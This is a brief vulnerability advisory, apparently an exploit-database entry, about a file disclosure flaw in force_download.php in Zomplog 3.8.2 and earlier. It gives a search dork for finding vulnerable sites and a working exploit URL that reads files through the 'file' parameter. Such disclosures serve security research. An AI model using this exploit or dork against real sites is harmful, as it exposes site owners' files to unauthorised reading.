Zomplog versions 3.8.2 and below suffer from a file disclosure vulnerability in force_download.php.
7a7d85f5bcf11c89b225116486c9f7b574ca5eae1ce84905164f20ccd185b9f5
Name: "Zomplog 3.8.2 <= file disclouse"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: Stack-Terrorist
Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
thnx : alah